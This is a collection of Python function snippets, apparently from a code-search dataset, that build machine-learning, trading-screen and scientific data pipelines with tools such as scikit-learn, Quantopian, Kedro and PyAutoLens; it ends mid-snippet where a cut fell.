[ "def make_pipeline():\n universe = TradableStocksUS('Real Estate') | TradableStocksUS('Utilities') | \\\n TradableStocksUS('Consumer Staples') | TradableStocksUS('Technology') | \\\n TradableStocksUS('Financials') | TradableStocksUS('Energy') | \\\n TradableStocksUS('Materials') | TradableStocksUS('Health Care') | \\\n TradableStocksUS('Industrials') | TradableStocksUS('Consumer Discretionary') | \\\n TradableStocksUS('Communications')\n\n roic = shfd.slice(dimension='MRT', period_offset=0).ROIC.latest\n ebit = shfd.slice(dimension='MRQ', period_offset=0).EBIT.latest\n ev = shfd.slice(dimension='MRQ', period_offset=0).EV.latest\n volatility = AnnualizedVolatility(window_length=100)\n value = ebit / ev\n\n roic_rank = roic.rank(mask=universe)\n value_rank = value.rank(mask=universe)\n volatility_rank = volatility.rank(mask=universe, ascending=False)\n\n spy_ma100_price = SMA(inputs=[USEquityPricing.close], \n window_length=100)[algo.sid(\"FIBBG000BDTBL9\")]\n spy_price = USEquityPricing.close.latest[algo.sid(\"FIBBG000BDTBL9\")]\n\n momentum_score = MomentumScore()\n\n overall_rank = roic_rank + value_rank + volatility_rank\n\n # seven_month_returns = Returns(window_length=148, mask=universe,)\n # one_month_returns = Returns(window_length=30, mask=universe,)\n\n pipeline = Pipeline(\n columns={\n 'stock' : master.SecuritiesMaster.Symbol.latest,\n 'sid': master.SecuritiesMaster.Sid.latest,\n 'sector' : master.SecuritiesMaster.usstock_Sector.latest,\n 'average_dollar_volume': AverageDollarVolume(window_length=200),\n 'price': EquityPricing.close.latest,\n 'volume': EquityPricing.volume.latest,\n 'roic' : roic,\n 'value' : value,\n 'volatility': volatility,\n 'roic_rank' : roic_rank,\n 'value_rank' : value_rank,\n 'momentum': momentum_score,\n 'momentum_decile': momentum_score.deciles(),\n 'volatility_decile' : volatility.deciles(),\n 'overall_rank' : overall_rank,\n 'overall_rank_decile': overall_rank.deciles(),\n 'trend_filter': spy_price > spy_ma100_price,\n # 'returns' : one_month_returns - seven_month_returns\n }, \n screen = universe\n )\n\n return pipeline", "def get_pipeline(tag=None):\n\n\n data_science_pipeline = (\n # interdiction_baseline_call_pl()\n # + interdiction_baseline_parse_pl()\n #+ interdiction_community_pl()\n #+ interdiction_community_parse_pl()\n #+ dijkstra_prep_paths_pl()\n #+ dijkstra_parse_paths_pl()\n #+ dijkstra_reachable_pl()\n #+ dijkstra_shortest_paths_pl()\n + dijkstra_pypy_pickle_pl()\n + dijkstra_pypy_paths_pl()\n + dijkstra_make_adj_pl()\n #+ dijkstra_opt()\n + dijkstra_flow()\n + sds_counterfactual_pl()\n + supply_interdiction_pl()\n + post_supply_interdiction_pl()\n )\n \n if tag:\n if type(tag)==str:\n return Pipeline([n for n in data_science_pipeline.nodes if tag in n.tags])\n elif type(tag)==list:\n return Pipeline([n for n in data_science_pipeline.nodes if len(n.tags - set(tag)) < len(n.tags)])\n \n else:\n return data_science_pipeline", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def get_pipeline(self):\n if hasattr(self, \"pipeline\"):\n return self.pipeline\n steps = [\n # before preprocessor, comes the feature extractor\n ('extractor', TurkishFeatureExtractor()),\n # first the pre-processor\n (\"preprocessor\", 
TurkishPreprocessor(self.stemmer_name_to_method[self.stemmer_method])),\n (\"vectorizer\", TurkishVectorizer(self.feature_name_to_class[self.feature])),\n # use pca\n # (\"pca\", TruncatedSVD(n_components=20, n_iter=10)),\n (\"adder\", TurkishFeatureAdder(n_components=20, n_iter=10)),\n (\"model\", self.model_name_to_class[self.model])\n ]\n self.pipeline = Pipeline(steps)\n return self.pipeline", "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def model(self) -> PipelineModel:\n return self._model", "def make_pipeline():\n # exchange = Fundamentals.exchange_id.latest\n # nyse_filter = exchange.eq('NYS')\n symbol_filter = StaticSids([TRADING_SID])\n set_benchmark(TRADING_SID) \n # volume_filter = VolumeFilter(\n # inputs=[USEquityPricing.volume],\n # window_length=1,\n # mask=symbol_filter\n # )\n\n # is_setup = volume_filter & alpha_long_weekly & alpha_long_daily\n weekly_high = WeeklyHigh(\n inputs=[USEquityPricing.high],\n mask=symbol_filter\n )\n weekly_low = WeeklyLow(\n inputs=[USEquityPricing.low],\n mask=symbol_filter\n )\n weekly_classifier = WeeklyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n )\n daily_classifier = DailyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n\n )\n\n pipe = Pipeline(\n screen=symbol_filter, # & (daily_classifier > 0),\n columns={\n 'daily_classifier': daily_classifier,\n 'daily_high': USEquityPricing.high.latest,\n 'daily_low': USEquityPricing.low.latest,\n 'weekly_classifier': weekly_classifier,\n 'weekly_high': weekly_high,\n 'weekly_low': weekly_low\n }\n )\n return pipe", "def make_pipeline():\r\n\r\n # Custom universe containing only desired assets (stocks with flag data)\r\n universe = StaticSids(my_stocks)\r\n\r\n return Pipeline(\r\n columns={\r\n #'flag_type': algo_data_full.flag_type.latest,\r\n #'flag_price': algo_data_full.flag_price.latest,\r\n #'end_flag_date': algo_data_full.end_flag_date.latest,\r\n #'end_flag_price': algo_data_full.end_flag_price.latest,\r\n 'up_flags': flag_counts.up.latest,\r\n 'down_flags': flag_counts.down.latest,\r\n 'up_ratio': up_ratios_2.up_ratio.latest,\r\n 'close': USEquityPricing.close.latest,\r\n },\r\n screen=universe\r\n )", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def build_model():\n pipeline = Pipeline([\n ('vectorizer', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n # (), # Feature engineering (word2vec/GloVe)\n (\"clf\", MultiOutputClassifier(RandomForestClassifier(n_estimators=100), n_jobs=-1))\n ])\n\n return 
pipeline", "def run(self):\n pipeline = set_pipeline()\n pipeline.fit(self.X_train, self.y_train)\n return pipeline", "def similar_bonds_pipeline():\n pipeline = Pipeline(\n steps=[\n ('scaler', StandardScaler()),\n #('encoder', OneHotEncoder()),\n ('pca', PCA(n_components=3)),\n ('knn', KNN()),\n ]\n )\n return pipeline", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n pipeline = Pipeline([('cvect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LinearSVC(multi_class=\"crammer_singer\"), n_jobs=1))\n ])\n\n parameters = {\n 'clf__estimator__C': 1,\n 'clf__estimator__max_iter': 1000 }\n \n model = GridSearchCV(pipeline, param_grid=parameters)\n\n\n return model", "def get_model_pipeline_from_file(self, oc):\r\n # Load model related files\r\n model_path = self.config['DATA_PATH'] + self.config['CUSTOMER_NAME'] + '/models/'\r\n\r\n model_file = model_path + self.task + '_' + str(oc) + '_pipeline.joblib'\r\n\r\n if os.path.isfile(model_file):\r\n model = joblib.load(model_file)\r\n return model\r\n return None", "def make_pipeline(context):\n \n # Base universe set to the Q1500US\n base_universe = Q500US()\n \n #Get all industry codes\n industry=morningstar.asset_classification.morningstar_industry_code.latest\n #Get all sector codes\n sector = Sector()\n \n # Create filters (to be used as masks) of different industries/sectors \n # This is the mask that should exclude the most stocks. \n # Note that these may need to be even further filtered to exclude securities outside of a \n # similar range of volumes/size. For instance, the defense sector stock provides stocks as large as # LMT but also small defense companies. Although this shouldn't matter due to the second filter of \n # crosscorrelation, this may be unnecassary computational expense. \n pipe=Pipeline()\n #Below forms a \"sentiment screen\" that takes only stocks that have been rated a certain number of times and of those ratings there are at least 2.85 times as many bull scored messages as there are bear scored messages. 
\n pipe.add(st.bull_scored_messages .latest, 'bull_scored_messages')\n pipe.add(st.bear_scored_messages .latest, 'bear_scored_messages')\n sentimentScreen=(((st.bull_scored_messages.latest) > (context.Sentiment_multiplier*st.bear_scored_messages.latest)) & (st.bear_scored_messages.latest > 5))\n \n dFilt=sector.eq(310) #Indicates aerospace/defense sector\n dFilt2=industry.eq(31052107) #Indicates aerospace/defense industry\n tFilt=sector.eq(311) #Indicates consumer electronics sector\n tFilt2=industry.eq(31167138) #Indicates consumer electronics industry \n cFilt=sector.eq(101) #Chemical sector\n cFilt2=industry.eq(10103003)\n aFilt=sector.eq(102)\n aFilt2=industry.eq(10209017) #Auto manufacturing industry\n depFilt2=industry.eq(10217034) #Department store industry\n #dFilt2,tFilt2,cFilt2,aFilt2=True,True,True,True #Remove industry requirement\n defenseFilt= dFilt & dFilt2 #Combination of filters\n techFilt= tFilt & tFilt2\n chemFilt = cFilt & cFilt2 \n autoFilt = aFilt & aFilt2 \n tradable=base_universe & (defenseFilt | techFilt | chemFilt | autoFilt | depFilt2) & sentimentScreen\n \n \n pipe.set_screen(tradable)\n pipe.add(defenseFilt,'defenseFilt')\n pipe.add(techFilt,'techFilt')\n pipe.add(chemFilt,'chemFilt')\n pipe.add(autoFilt,'autoFilt')\n pipe.add(depFilt2,'depFilt')\n \n \n \n #TODO: May also want to return stock sentiment data and further filter tuple couples by only accepting couples with sentiment data in a similar range (further attributing to the validity of the calculated cross-correlation)\n \n return pipe", "def make_pipeline():\r\n base_universe = Q1500US()\r\n sector = Sector() \r\n # screen is based off of returns\r\n returns = Returns(window_length = 2)\r\n # check if stock price has good strength, but not necessarily overbought\r\n rsi = RSI() \r\n price = USEquityPricing.close.latest\r\n # creating filter by specifying the type of returns desired\r\n top_return_stocks = returns.top(1,mask=base_universe, groupby=sector)\r\n pipe = Pipeline(\r\n columns = {\r\n 'rsi': rsi,\r\n 'price': price\r\n },\r\n # filter top return stocks, and stocks that are not being overbought\r\n # but are not too oversold either\r\n screen = base_universe & top_return_stocks & (20 < rsi < 80)\r\n # the above is equivalent to: choose stocks from the base universe that have had the top returns in their sectors and have a good RSI value\r\n )\r\n return pipe", "def build_model():\n nltk.download(['punkt', 'wordnet', 'averaged_perceptron_tagger', 'stopwords'])\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer())\n ])),\n \n ('strarting_verb', StartingVerbExtractor())\n \n ])),\n\n ('clf', MultiOutputClassifier(estimator = AdaBoostClassifier(random_state = 42)))\n\n ])\n \n parameters = {\"clf__estimator__learning_rate\": [0.1, 0.5, 1.0],\n \"clf__estimator__n_estimators\": [25, 50, 75]\n }\n \n from sklearn.model_selection import GridSearchCV\n cv = GridSearchCV(pipeline, param_grid = parameters) \n \n return cv", "def _get_pipeline(self, params_dict):\n p = Pipeline(steps=[('normalise', StandardScaler()),\n ('add_noise', NoiseAdder()),\n ('dim_reduce', PCA()),\n ('cluster', KMeans())])\n p.set_params(**params_dict)\n return p", "def find_correct_pipeline(data_name):\n\n if data_name == 'GSE13355':\n pipeline = PL.make_pipeline(\n PP.Binarizer(threshold=0.7000000000000001),\n E.RandomForestClassifier(bootstrap=False, criterion=\"entropy\", max_features=0.35000000000000003,\n min_samples_leaf=3, 
min_samples_split=18, n_estimators=100)\n )\n elif data_name == 'GSE14905':\n pipeline = PL.make_pipeline(svm.LinearSVC(C=5.0, dual=True, loss=\"squared_hinge\", penalty=\"l2\", tol=0.001))\n elif data_name == 'GSE27887':\n pipeline = PL.make_pipeline(T.DecisionTreeClassifier(criterion=\"gini\", max_depth=4, min_samples_leaf=1, min_samples_split=10))\n elif data_name == 'GSE30999':\n pipeline = PL.make_pipeline(N.KNeighborsClassifier(n_neighbors=9, p=2, weights=\"distance\"))\n elif data_name == 'GSE32924':\n pipeline = PL.make_pipeline(E.GradientBoostingClassifier(learning_rate=1.0, max_depth=8, max_features=0.7500000000000001, min_samples_leaf=4,\n min_samples_split=3, n_estimators=100, subsample=0.7000000000000001))\n\n elif data_name == 'GSE34248':\n pipeline = PL.make_pipeline(E.RandomForestClassifier(bootstrap=True, criterion=\"entropy\", max_features=0.9000000000000001, min_samples_leaf=3,\n min_samples_split=6, n_estimators=100))\n elif data_name == 'GSE41662':\n pipeline = PL.make_pipeline(svm.LinearSVC(C=0.001, dual=True, loss=\"hinge\", penalty=\"l2\", tol=0.01))\n elif data_name == 'GSE78097':\n pipeline = PL.make_pipeline(\n E.RandomForestClassifier(bootstrap=False, criterion=\"gini\", max_features=1.0, min_samples_leaf=4,\n min_samples_split=10, n_estimators=100))\n elif data_name == 'GSE36842':\n raise NotImplementedError()\n else:\n raise NotImplementedError('No pipeline is created for this data set')\n\n return pipeline", "def make_pipeline():\r\n\r\n mkt_cap_screen = (morningstar.valuation.market_cap.latest > 1e9)\r\n\r\n return Pipeline(\r\n columns={\r\n 'Free Cash Flow': morningstar.cash_flow_statement.free_cash_flow.latest,\r\n }, screen=mkt_cap_screen)", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def build_svm_pipeline():\n svm_pipeline = None\n\n svm_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', SGDClassifier()),\n ])\n\n return svm_pipeline", "def build_model():\n pipeline = Pipeline(\n [\n (\"vect\", CountVectorizer(tokenizer=tokenize)),\n (\"tfidf\", TfidfTransformer()),\n (\"clf\", MultiOutputClassifier(LinearSVC(dual=False))),\n ]\n )\n\n # use grid search to optimize the pipeline parameters\n parameters = {\"tfidf__use_idf\": (True, False), \"clf__estimator__C\": [1, 100]}\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, max_df = 0.75, max_features = 5000, ngram_range = (1, 2))),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(estimator=RandomForestClassifier(n_estimators = 200, min_samples_split = 2)))\n ])\n \n return pipeline", "def make_pipeline(slam, settings):\n\n pipeline_name = \"pipeline_source[inversion]\"\n\n \"\"\"\n This pipeline is tagged according to whether:\n\n 1) Hyper-fitting settings (galaxies, sky, background noise) are used.\n 2) The lens galaxy mass model includes an `ExternalShear`.\n 3) The `Pixelization` and `Regularization` scheme of the pipeline (fitted in phases 3 & 4).\n \"\"\"\n\n path_prefix = f\"{slam.path_prefix}/{pipeline_name}/{slam.source_inversion_tag}\"\n\n \"\"\"\n Phase 1: Fit the `Pixelization` and `Regularization`, where we:\n\n 1) Fix the lens mass model to the `MassProfile`'s inferred by the previous pipeline.\n \"\"\"\n\n phase1 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[1]_mass[fixed]_source[inversion_magnification_initialization]\",\n n_live_points=30,\n ),\n galaxies=dict(\n 
lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last.instance.galaxies.lens.mass,\n shear=af.last.instance.galaxies.lens.shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=af.last.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=af.last.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase1 = phase1.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 2: Fit the lens`s mass and source galaxy using the magnification `Inversion`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 1.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of the previous pipeline.\n \"\"\"\n\n phase2 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[2]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last[-1].model.galaxies.lens.mass,\n shear=af.last[-1].model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase1.result.instance.galaxies.source.pixelization,\n regularization=phase1.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase1.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase1.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase1.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase2 = phase2.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 3: fit the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the lens `MassProfile` to the result of phase 2.\n \"\"\"\n\n phase3 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[3]_mass[fixed]_source[inversion_initialization]\",\n n_live_points=30,\n evidence_tolerance=slam.setup_hyper.evidence_tolerance,\n sample=\"rstagger\",\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=phase2.result.instance.galaxies.lens.mass,\n shear=phase2.result.instance.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=slam.pipeline_source_inversion.setup_source.pixelization_prior_model,\n regularization=slam.pipeline_source_inversion.setup_source.regularization_prior_model,\n hyper_galaxy=phase2.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase2.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase2.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase3 = phase3.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 4: fit the lens`s mass using the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 3.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of phase 2.\n \"\"\"\n\n mass = slam.pipeline_source_parametric.setup_mass.mass_prior_model_with_updated_priors(\n 
index=-1, unfix_mass_centre=True\n )\n\n phase4 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[4]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=mass,\n shear=phase2.result.model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase3.result.instance.galaxies.source.pixelization,\n regularization=phase3.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase3.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase3.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase3.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase4 = phase4.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=True\n )\n\n return al.PipelineDataset(\n pipeline_name, path_prefix, phase1, phase2, phase3, phase4\n )", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipelineModel\")", "def build_model(self) -> Pipeline:\r\n clf = RandomForestClassifier(\r\n n_estimators=200,\r\n max_features='auto',\r\n min_samples_leaf=1,\r\n min_samples_split=3,\r\n random_state=42, \r\n n_jobs=-1)\r\n model = MultiOutputClassifier(clf)\r\n \r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n ('tfidf', \r\n TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.5, ngram_range=(1,2)))\r\n ])),\r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n ('clf', model)\r\n ])\r\n \r\n return pipeline", "def build_model():\n \n #english trained optimized pipeline for word embedding\n nlp = spacy.load(\"en_core_web_md\") # this model will give you 300D\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ])),\n \n ('embeddings_pipeline', Pipeline([\n ('vect_trans',SpacyVectorTransformer(nlp)),\n ('reduce_dim', TruncatedSVD(50)),\n ])),\n \n ])),\n \n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__embeddings_pipeline__reduce_dim__n_components':(50,60,70,100,120,130,150)\n }\n cv = GridSearchCV(pipeline, param_grid=parameters,cv=2)\n \n return cv", "def get_model():\n model = ecole.scip.Model.from_file(str(DATA_DIR / \"bppc8-02.mps\"))\n model.disable_cuts()\n model.disable_presolve()\n model.set_param(\"randomization/permuteconss\", True)\n model.set_param(\"randomization/permutevars\", True)\n model.set_param(\"randomization/permutationseed\", 784)\n model.set_param(\"randomization/randomseedshift\", 784)\n model.set_param(\"randomization/lpseed\", 784)\n return model", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', 
TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n \n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n # specify parameters for grid search\n parameters = {\n 'clf__estimator__n_estimators': [50],\n 'clf__estimator__learning_rate': [1]\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def build_model():\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n])\n \n # specify parameters for grid search\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.75, 1.0)\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs= 8, cv = 3, verbose = 2)\n\n return cv", "def load_pipeline():\n\n try:\n logging.info(\"Loading the fitted pipeline...\")\n with open(base.SAVED_MODEL_PATH, \"rb\") as model_file:\n pipeline = pickle.load(model_file)\n logging.info(\"Loading completed successfully...\")\n except FileNotFoundError:\n logging.error(\"Model file has not been found.\")\n raise\n return pipeline", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def buildModel( self, transformer, classifier ):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X , self.y )\n joblib.dump ( summitAIModel , self.modeldump )", "def fill_pipeline():\n\n # m1_pca = PCA()\n m1_pca = PCA(svd_solver='randomized', whiten=True) # 与官网里子一致的后2个参数,否则分数很差\n # m1_pca.fit(X_train)\n\n m2_svc = SVC(kernel='rbf', class_weight='balanced')\n\n pipe = Pipeline(steps=[('pca', m1_pca),\n ('svc', m2_svc)])\n print('\\n===================原 estimator')\n pprint(pipe.named_steps)\n return pipe", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n ('starting_verb', StartingVerbExtractor())\n ])),\n ('clf', DecisionTreeClassifier())\n ])\n\n parameters = [\n {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (DecisionTreeClassifier(min_samples_split=3),),\n 'clf__max_depth': (None, 4)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MultiOutputClassifier(LinearSVC(multi_class='ovr')),)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MLPClassifier(),),\n 'clf__hidden_layer_sizes': ((100, 10), (50,), (50, 10))\n }\n ]\n\n cv = 
GridSearchCV(pipeline, parameters, cv=3, n_jobs=4, verbose=10)\n \n return cv", "def model(self):\n i = self.keras.Input(self.s)\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def make_pipeline(context):\n \n # Base universe of top 500 US stocks.\n base_universe_filter = Q500US()\n\n # Stocks of only tech sector.\n tech_sector = Sector(mask=base_universe_filter)\n tech_universe_filter = base_universe_filter & tech_sector.eq(311)\n\n # Top 10 tech stocks with largest market cap.\n mkt_cap_filter = morningstar.valuation.market_cap.latest\n top_mkt_cap_tech_filter = mkt_cap_filter.top(context.NUM_SYMBOLS, mask=tech_universe_filter)\n\n # Bollinger band factor with Stdev factor 2.\n lower_band_factor, middle_factor, upper_band_factor = BollingerBands(window_length=22, k=2, mask=top_mkt_cap_tech_filter)\n\n # Percent difference between (price, lower_band) and (price, upper_band).\n price = USEquityPricing.close.latest\n buy_percent_factor = ((lower_band_factor - price)*100)/price\n sell_percent_factor = ((price - upper_band_factor)*100)/price\n\n # Mean reversion buy and sell filters.\n # Sell when price exceeds upper-band and buy when price is below lower-band.\n buy_filter = buy_percent_factor > 0\n sell_filter = sell_percent_factor > 0\n\n # Build and return the Pipeline.\n pipe_bbands = Pipeline(columns={'buy_percent': buy_percent_factor,\n 'lower_band': lower_band_factor,\n 'buy': buy_filter,\n 'price': price,\n 'sell': sell_filter,\n 'upper_band': upper_band_factor,\n 'sell_percent': sell_percent_factor}, screen=top_mkt_cap_tech_filter)\n \n return pipe_bbands", "def build_model():\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(DecisionTreeClassifier()))\n ])\n\n \n parameters = {'clf__estimator__min_samples_split':[2, 4, 6],\n 'clf__estimator__max_depth': [2, 4]}\n\n #parameters = {'clf__estimator__min_samples_split':[2]}\n cv = GridSearchCV(pipeline, parameters)\n\n return(cv)", "def create_pipeline(path):\n\n pipeline = import_file(path)\n # Perform Wigner-Seitz analysis:\n ws = WignerSeitzAnalysisModifier(\n output_displaced=False, # Output sites\n per_type_occupancies=True, # Output occupancies per atom type\n affine_mapping=ReferenceConfigurationModifier.AffineMapping.ToReference)\n pipeline.modifiers.append(ws)\n # Calculate total and elementwise occupancies\n pipeline.modifiers.append(total_occupancy_modifier)\n # Select all defect sites\n pipeline.modifiers.append(select_defects_modifier)\n # Delete all non-defect sites\n pipeline.modifiers.append(InvertSelectionModifier())\n pipeline.modifiers.append(DeleteSelectedModifier())\n # Find defect clusters\n pipeline.modifiers.append(ClusterAnalysisModifier(\n cutoff=CLUSTER_CUTOFF,\n sort_by_size=False))\n # Classify defect clusters\n pipeline.modifiers.append(classify_defect_clusters_modifier)\n\n return pipeline", "def model(x):\n SS = SugarscapeCg(max_metabolism=x['metab'], max_vision=x['vision'])\n SS.verbose = False\n y = SS.run_model(step_count=30)\n return {'y': y}", "def get_non_refinement_pipeline():\n node_scaling = 